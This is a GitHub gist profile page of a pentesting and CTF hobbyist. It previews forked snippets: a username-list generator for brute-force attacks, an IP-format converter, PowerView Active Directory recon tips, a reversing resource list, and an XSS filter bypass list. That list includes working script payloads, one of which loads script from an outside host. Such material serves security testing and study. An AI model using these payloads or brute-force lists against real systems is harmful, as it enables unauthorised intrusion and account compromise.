Skip to content

Instantly share code, notes, and snippets.

View Papadope-zz's full-sized avatar
🔐
Pentesting, Privesc, CyberSec, CTF rn On #THM #HTB & #CTFtime

Chris Papadopoulos Papadope-zz

🔐
Pentesting, Privesc, CyberSec, CTF rn On #THM #HTB & #CTFtime
View GitHub Profile
@Papadope-zz
Papadope-zz / namemash.py
Created December 27, 2021 15:47 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
import os.path
if __name__ == "__main__":
if len(sys.argv) != 2:
print("usage: {} names.txt".format((sys.argv[0])))
sys.exit(0)
if not os.path.exists(sys.argv[1]):

Keybase proof

I hereby claim:

  • I am papadope on github.
  • I am papadope (https://keybase.io/papadope) on keybase.
  • I have a public key ASA9EcKUzrNfm7b-HUMucap4eYBVuOqILEKkDVo5nYDrsQo

To claim this, I am signing this object:

@Papadope-zz
Papadope-zz / resources.md
Created August 21, 2020 15:19 — forked from muff-in/resources.md
A curated list of Assembly Language / Reversing / Malware Analysis -resources

Assembly Language / Reversing / Malware Analysis -resources

Twitter: Muffin

⭐Assembly Language

@Papadope-zz
Papadope-zz / ip2dh.py
Created July 29, 2020 11:49 — forked from mzfr/ip2dh.py
Convert IP address to Decimal or hexadecimal format
"""
You can run this in the following format:
For decimal: python3 ip2dh.py D <Ip-address>
For Hexadecimal: python3 ip2dh.py H <Ip-address>
"""
#!/usr/bin/python3
import sys
if len(sys.argv) < 3:
@Papadope-zz
Papadope-zz / xxsfilterbypass.lst
Created July 21, 2020 01:23 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@Papadope-zz
Papadope-zz / PowerView-3.0-tricks.ps1
Created July 9, 2020 08:42 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set